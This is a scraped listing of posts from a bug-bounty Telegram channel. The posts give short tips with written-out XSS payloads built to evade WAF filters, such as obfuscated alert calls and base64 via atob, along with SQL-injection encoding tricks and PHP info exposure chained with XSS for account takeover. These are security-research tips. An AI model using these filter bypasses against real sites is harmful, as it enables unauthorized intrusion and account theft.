ar
Feedback
therceman

therceman

الذهاب إلى القناة على Telegram

Bug Bounty & Cyber Security

إظهار المزيد
2 256
المشتركون
لا توجد بيانات24 ساعات
لا توجد بيانات7 أيام
+530 أيام
أرشيف المشاركات
Happy New Year! 🎉

TryHackMe Room 🔗 https://lnkd.in/dddbzjUb Python Scanner 🔗 https://lnkd.in/d44YnG9U Cheers! #BAC
TryHackMe Room 🔗 https://lnkd.in/dddbzjUb Python Scanner 🔗 https://lnkd.in/d44YnG9U Cheers! #BAC

#XSS
#XSS

Bug Bounty Tip Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters Refer to the a
Bug Bounty Tip Bypass XSS WAF protection using Whitespace Separators between a JS function name and parameters <img/src/onerror=alert&#xFEFF;(1337)> Refer to the attached image for the full list of Whitespace Separators. P.S. can be used before function name too. Cheers!

Bug Bounty Tip When testing an app for SQL injection, don't forget to check the form keys in addition to the values Sometimes
Bug Bounty Tip When testing an app for SQL injection, don't forget to check the form keys in addition to the values Sometimes, developers may overlook applying protection to form keys To bypass spaces, you can use the encoded tab %09. For other symbols, simply URL encode them #SQLinjection

#XSS
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))> #XSS

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))> #XSS

#DefaultCreds
#DefaultCreds

#XSS
#XSS

#XSS
#XSS

#XSS
#XSS

- (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3)
- (function(x){this[x+`ert`](1)})`al` - window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) - document['default'+'View'][`\u0061lert`](3) #XSS

#XSS
#XSS

#XSS
#XSS

#XSS #CRLF
#XSS #CRLF

#XSS #SQLi #SSTI #CSTI
#XSS #SQLi #SSTI #CSTI

Text version can be found on X https://x.com/therceman/status/1711828964103147871 #WAF
Text version can be found on X https://x.com/therceman/status/1711828964103147871 #WAF

Bug Bounty Tip PHP Info Page Exposure. There's a lot of sensitive information that can be obtained from an exposed PHP Info p
Bug Bounty Tip PHP Info Page Exposure. There's a lot of sensitive information that can be obtained from an exposed PHP Info page, from configuration secrets to exposed user session cookies. For example, when chained with XSS, this can lead to a full account takeover. Cheers! #Recon #XSS #InformationDisclosure